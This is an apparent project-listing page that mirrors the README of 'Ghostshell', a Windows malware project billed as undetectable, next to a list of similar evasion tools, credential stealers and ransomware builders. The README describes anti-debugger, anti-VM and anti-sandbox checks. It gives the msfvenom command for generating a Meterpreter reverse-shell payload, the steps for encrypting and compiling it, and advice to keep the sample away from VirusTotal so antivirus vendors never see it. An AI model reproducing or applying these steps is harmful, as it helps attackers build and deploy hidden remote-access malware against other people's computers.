GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → ReddyyZ → Ghostshell

ReddyyZ / Ghostshell

Licence: mit
Malware indetectable, with AV bypass techniques, anti-disassembly, etc.

Programming Languages

c
50402 projects - #5 most used programming language

Labels

malwaremeterpreter

Projects that are alternatives of or similar to Ghostshell

Green Hat Suite
Green-hat-suite is a tool to generate meterpreter/shell which could evade antivirus.
Stars: ✭ 112 (-61.77%)
Mutual labels:  malware, meterpreter
Python Rootkit
Python Remote Administration Tool (RAT) to gain meterpreter session
Stars: ✭ 358 (+22.18%)
Mutual labels:  malware, meterpreter
trolo
trolo - an easy to use script for generating Payloads that bypasses antivirus
Stars: ✭ 45 (-84.64%)
Mutual labels:  malware, meterpreter
Hercules
HERCULES is a special payload generator that can bypass antivirus softwares.
Stars: ✭ 526 (+79.52%)
Mutual labels:  malware, meterpreter
MsfMania
Python AV Evasion Tools
Stars: ✭ 388 (+32.42%)
Mutual labels:  malware, meterpreter
Community
Volatility plugins developed and maintained by the community
Stars: ✭ 252 (-13.99%)
Mutual labels:  malware
Php Malware Scanner
Scans PHP files for malwares and known threats
Stars: ✭ 274 (-6.48%)
Mutual labels:  malware
Hack-Utils
Script to facilitate different functions and checks
Stars: ✭ 27 (-90.78%)
Mutual labels:  malware
Yobi
Yara Based Detection Engine for web browsers
Stars: ✭ 39 (-86.69%)
Mutual labels:  malware
Medusa
Binary instrumentation framework based on FRIDA
Stars: ✭ 258 (-11.95%)
Mutual labels:  malware
Nt wrapper
A wrapper library around native windows sytem APIs
Stars: ✭ 287 (-2.05%)
Mutual labels:  malware
Crypter
Crypter - Python3 based builder and ransomware compiled to Windows executable using PyInstaller
Stars: ✭ 268 (-8.53%)
Mutual labels:  malware
Simpleator
Simpleator ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that leverages several new features that were added in Windows 10 Spring Update (1803), also called "Redstone 4", with additional improvements that were made in Windows 10 October Update (1809), aka "Redstone 5".
Stars: ✭ 260 (-11.26%)
Mutual labels:  malware
Egesploit
EGESPLOIT is a golang library for malware development
Stars: ✭ 275 (-6.14%)
Mutual labels:  meterpreter
TeleShadow2
TeleShadow - Telegram Desktop Session Stealer (Windows)
Stars: ✭ 88 (-69.97%)
Mutual labels:  malware
Adamantium Thief
🔑 Decrypt chromium based browsers passwords, cookies, credit cards, history, bookmarks, autofill. Version > 80 is supported.
Stars: ✭ 283 (-3.41%)
Mutual labels:  malware
M-Botnet
A C2 project that controls a self-propagating MS17-010 worm.
Stars: ✭ 39 (-86.69%)
Mutual labels:  malware
Al Khaser
Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection.
Stars: ✭ 3,573 (+1119.45%)
Mutual labels:  malware
Freki
🐺 Malware analysis platform
Stars: ✭ 285 (-2.73%)
Mutual labels:  malware
Infectpe
InfectPE - Inject custom code into PE file [This project is not maintained anymore]
Stars: ✭ 266 (-9.22%)
Mutual labels:  malware
View All Similar Projects ➔

GhostShell

In this malware, are used some techniques to try bypass the AVs, VMs, and Sandboxes, with only porpuse to learning more. I'm not responsible for your actions.

license last-commit made-by size binary-size issues issues-closed

followers stars forks watchers

Bypass Techniques | Generating the Shellcode | How to compile for Windows on Linux | Credits | License

⚠️ Atention!!!

To check if the antivirus is detecting the malware, NEVER send it to the virustotal, IT WILL BE SENT TO THE ANTIVIRUS COMPANIES AND WILL BE BROKEN, to analyze, send it to https://www.hybrid-analysis.com/ and remember to check the option "Do not send my sample to non-affiliated third parties", as in the example below.

💣 Bypass Techniques

Anti-Debugger

To try bypass the Debuggers, I'm using the "IsDebuggerPresent()" of "Windows.h" librarie to checks if a debugger is running.

Anti-VM / Anti-Sandbox / Anti-AV

  • Enumerate Process Function

    Enumerates all process running on the system, and compares to the process in the black-list, if found a process and this is equal to any process in the black-list returns -1 (identified).

  • Sleep Acceleration Check Function

    First, gets the current time, and sleeps 2 minutes, then, gets the time again, and compare, if the difference is less than 2, returns -1 (identified).

  • Mac Address Check Function

    Gets the system mac address and compare to the macs, in the black-list, if the system mac address is equal to any mac in the black-list returns -1 (identified).

☢️ Generating the Shellcode

Generating

To generate the shellcode type in the terminal: msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c, copy the shellcode generated and encrypt it.

To encrypt shellcode use the encrypt_shellcode script.
On linux type: ./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""
On windows type: encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""

💻 How to compile for Windows on Linux

To compile for Windows on Linux, first, install mingw-w64: sudo apt-get install mingw-w64, then, to compile for 32 bits: i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static, and to 64 bits: x86_64-w64-mingw32 -o main.exe main.c -l psapi -static

📖 Credits

Credits for https://github.com/rastating, the encrypt_shellcode is based on a post of your github.io: https://rastating.github.io/creating-a-shellcode-crypter/

📝 License

This project is under MIT license. See at here LICENSE for more informations.

> It is not ready yet!

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].